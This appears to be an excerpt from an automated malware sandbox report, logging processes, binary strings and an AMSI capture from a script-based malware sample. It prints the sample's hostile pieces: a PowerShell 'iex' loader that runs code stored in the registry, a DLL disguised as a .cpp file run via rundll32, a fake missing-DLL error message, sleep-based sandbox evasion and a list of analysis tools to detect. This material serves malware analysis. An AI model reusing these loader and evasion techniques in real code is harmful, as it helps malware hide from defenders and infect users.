Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDDD0.tmp' 'c:\Users\user\AppData\Local\Temp\tjafqng0\CSC6B09D7CB2D7045B59F7434F2A8CE445.TMP' |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline' |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESEAC0.tmp' 'c:\Users\user\AppData\Local\Temp\qlsida3o\CSCC809748AA5EB4643A41D26B71B98A016.TMP' |
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer |
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer |
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline' |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline' |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDDD0.tmp' 'c:\Users\user\AppData\Local\Temp\tjafqng0\CSC6B09D7CB2D7045B59F7434F2A8CE445.TMP' |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESEAC0.tmp' 'c:\Users\user\AppData\Local\Temp\qlsida3o\CSCC809748AA5EB4643A41D26B71B98A016.TMP' |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdbXP source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp |
Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdbXP source: powershell.exe, 00000019.00000002.1238604024.000001B6D76F8000.00000004.00000001.sdmp |
Source: | Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.1013379730.000001BA25DFD000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000002.1193389238.000000006FBF4000.00000002.00020000.sdmp, fum.cpp.0.dr |
Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp |
Source: | Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp |
Source: | Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp |
Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp |
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe" |